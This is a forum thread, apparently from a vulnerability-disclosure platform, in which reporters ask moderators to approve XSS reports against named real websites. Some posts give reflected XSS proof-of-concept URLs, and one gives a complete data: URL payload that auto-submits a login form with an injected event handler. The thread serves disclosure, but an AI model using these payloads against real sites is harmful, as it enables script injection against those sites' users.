Manual Approval Thread
approved
Re: Manual Approval Thread
Hello,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Many thanks,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Many thanks,
Re: Manual Approval Thread
1970226 Alt + Shift +X
1970272, 1970286, 1970934 wait for the page to load
1970272, 1970286, 1970934 wait for the page to load
Re: Manual Approval Thread
This has been noted as "Can't Reproduce Vulnerability" but if you do as I've said by going to the url "https://shipafrika.com/track_shipment.p ... BOUNTY%27)+" you will get xss popup. You need to remember the + at the end.JonLaing4 wrote: ↑Tue Mar 30, 2021 6:34 pmHello,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Screenshot from 2021-03-30 19-35-33.png
Many thanks,
<p>Click Here: <a href="https://shipafrika.com/track_shipment.p ... XSS</a></p>
This screenshot is from the above url using Chrome.
And this one is from Firefox:
Please move to approved/On Hold
Re: Manual Approval Thread
1971939 Chrome, wait for the page to load, if doesn't work try a few more times
Re: Manual Approval Thread
Greetings,
Can you check :
1973969
1952022
1951722
Best regards,
Rbcafe
Can you check :
1973969
1952022
1951722
Best regards,
Rbcafe
Re: Manual Approval Thread
Hello,
Please approve ID 1975311
You can copy and paste this into a browser and you will get xss popup when the site loads click on the Password box:
data:text/html,<form method='POST' action='https%3A%2F%2Fwww.awpwriter.org%2Fuser%2Flogin'><input name='email' value=''><input name='password' value='%26%2334%3Bonclick%3Dconfirm%28%29%20'><input name='redirect_url' value='https%3A%2F%2Fwww.awpwriter.org%2F'></form><script>document.forms[0].submit()</script>
Please approve ID 1975311
You can copy and paste this into a browser and you will get xss popup when the site loads click on the Password box:
data:text/html,<form method='POST' action='https%3A%2F%2Fwww.awpwriter.org%2Fuser%2Flogin'><input name='email' value=''><input name='password' value='%26%2334%3Bonclick%3Dconfirm%28%29%20'><input name='redirect_url' value='https%3A%2F%2Fwww.awpwriter.org%2F'></form><script>document.forms[0].submit()</script>
Re: Manual Approval Thread
Greetings,
Can you check :
1973971
1973969
1973968
1973967
Best regards,
Rbcafe
Can you check :
1973971
1973969
1973968
1973967
Best regards,
Rbcafe
Re: Manual Approval Thread
Also 1972194, 1972206, 1972431, 1976833. Some of them seem patched already though.
Who is online
Users browsing this forum: No registered users and 2 guests